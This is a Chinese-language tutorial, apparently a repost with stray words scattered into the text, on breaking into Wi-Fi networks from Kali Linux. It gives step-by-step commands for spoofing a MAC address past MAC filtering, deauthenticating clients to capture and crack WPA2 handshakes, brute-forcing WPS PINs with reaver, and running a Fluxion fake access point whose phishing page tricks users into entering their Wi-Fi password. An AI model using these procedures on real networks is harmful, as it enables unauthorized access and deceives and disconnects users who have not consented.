本文但願能夠幫助到想要學習接觸此方面、或興趣使然的你,讓你有個大概的印象. 文中可能存在錯誤操做或錯誤理解,望你們不吝指正.
!閱前須知!
本文是基於我幾年前的一本筆記本,上面記錄了我學習網絡基礎時的部分筆記
本文中的工具可能已通過時,或者使用方法已經改變了,感興趣能夠深刻查閱資料.
(可是我仍是列出之前的使用方法供你們借鑑).html
ps.若對無線攻擊手段與ARP欺騙感興趣能夠參考如下兩篇文章
【無線安全實踐入門】基礎攻擊手段與經常使用工具簡介
【無線安全實踐入門】網絡掃描和ARP欺騙linux
ps.
本文環境在Kali下,學習最好具有一點linux基礎知識.
本文中的'混雜模式'並非全部網卡都支持,詳請搜索支持網卡型號.
本文第一節和第二節的方法受限於硬件配置等因素,破解時間過長也是合理的.
web
很是優秀的無線網絡分析套件,功能強大.
許多安全軟件套件都默認(添加/調用)此套件來完成操做.瀏覽器
--首先,先要切換到可以支持'混雜模式'的網卡(通常都是購買USB無線網卡) --開啓混雜模式(開啓以後,網卡名可能會改變) > ifconfig (網卡名) down > iwconfig (網卡名) mode monitor > ifconfig (網卡名) up
1.1.鏈接MAC地址綁定的wifi安全
--查看附件網絡中的wifi,並觀察其詳細信息(channel、BSSID(MAC)等) > airodump-ng (網卡名) --得知詳細信息後,能夠中止查看(ctrl+c) --開始拿有效的mac地址信息(儘可能等久點,包多點) > airodump-ng -c (信道channel) --bssid (BSSID(MAC) (網卡名) --拿到有效mac地址(不要拿到路由器的mac) --修改本機mac > ifconfig (網卡名) down > macchanger -m (MAC地址) (網卡名) > ifconfig (網卡名) up --注意,此方法拿到有效mac地址,並未拿到wifi密碼
1.2.WPA2加密的wifi網絡
--查看附件網絡中的wifi,並觀察其詳細信息(channel、BSSID(MAC)等) > airodump-ng (網卡名) --得知詳細信息後,能夠中止查看(ctrl+c) --開始進行查看route與client的mac地址,[-w]選項的意思就是write > airodump-ng -w wpa -c (信道channel) --bssid (BSSID(MAC) (網卡名) --ignore-negative-one --查看route與client的mac地址 --開始得到握手包.cap > airoplay-ng --deauth 10 -a (route的mac) -c (client的mac) (網卡名) --ignore-negative-one --對握手包.cap進行破解 aircrack-ng -w (指定字典) (cap握手包名) --字典能夠本身製做(Crunch工具),也能夠在網上下載大神的字典 --一個NB的字典,對你的破解!事半功倍!
1.3.WEP加密的wifi工具
--因爲這種加密基本已經捨棄了,因此就不說了
經過輸入PIN碼來鏈接wifi也是能夠的,PIN碼的破解也是一種不錯的方法.
常見的工具備reaver、minidwep-gtk等工具,這裏我就說下reaver工具.學習
--首先,先要切換到可以支持'混雜模式'的網卡(通常都是購買USB無線網卡) --開啓混雜模式(開啓以後,網卡名可能會改變) > ifconfig (網卡名) down > iwconfig (網卡名) mode monitor > ifconfig (網卡名) up --選作:能夠嘗試掃描是否有啓用WPS的wifi --Wash工具就是一款針對'判斷wifi是否啓用WPS'的工具 --查看附件網絡中的wifi,並觀察PWR值小於70的來破解(記錄BSSID,記住要是路由器的) > airodump-ng (網卡名) --開始進行破解(注意是路由器的MAC地址,PIN碼是針對路由器的) > reaver -i (網卡名) -b (路由器MAC地址) -a -S -vv --1.若是出現 warning fail to associate ... --則說明破解失敗(失敗緣由包括對象路由器未開啓WPS等) --2.提示給出了 PIN碼 或 PIN碼和PSK密鑰(wifi密碼) --則說明破解成功(記錄PIN碼)/(使用PSK密鑰直接嘗試鏈接wifi) --選作:能夠嘗試獲得wifi密碼(PIN碼是能夠連wifi) reaver -i (網卡名) -b (路由器MAC地址) -p (剛獲得的PIN碼)
一個很是不錯的社工破解wifi神器.加密
與前面操做思路不一樣.
它是經過模擬原有wifi(FakeAP),用戶進行鏈接
而後wifi會斷開網絡,並向鏈接用戶發送請求(瀏覽器跳轉頁面),請求輸入原wifi密碼
用戶在收到請求後,只需輸入正確密碼,wifi就會恢復網絡,而你得到wifi密碼
注意,Fluxion會自動判斷wifi密碼是否正確,從而作出下一步操做
ps.此方法的好處就是不用耗費資源去破解密碼.code
ps.Fluxion運行時須要調用許多其它工具,部分工具可能須要另行下載(運行時會提示有哪些未下載)
--運行軟件(在軟件目錄下) > ./fluxion > 網卡(選擇網卡) > channels(選擇全部信道) > 掃描wifi(掃描到須要的結果時,按ctrl+c) > 選擇wifi(輸入一、二、3等選擇) --創建一個假AP > 選擇攻擊方式(選FakeAP-Hostapd...) > 選擇保存路徑(可空格跳過,則保存在桌面/root/Desktop/) --會自動出現窗口 > 握手包選擇(aircrack-ng...) --抓包分配包 > 數據包分配(Deauth all) --如果以上步驟正確完成,等抓包抓完,會出現選擇 > 選擇web interface > 選擇語言(提示用戶輸入密碼時的界面語言) --等待用戶鏈接上網,在瀏覽器輸入正確密碼(工具會自動驗證密碼是否正確),工具就會自動中止 --得到wifi正確密碼
破解wifi能夠說是比較有意思、而且有挑戰性的一塊知識點了,
更多的無線攻防操做,其實都是創建在連入局域網的前提之下的.
加油,共勉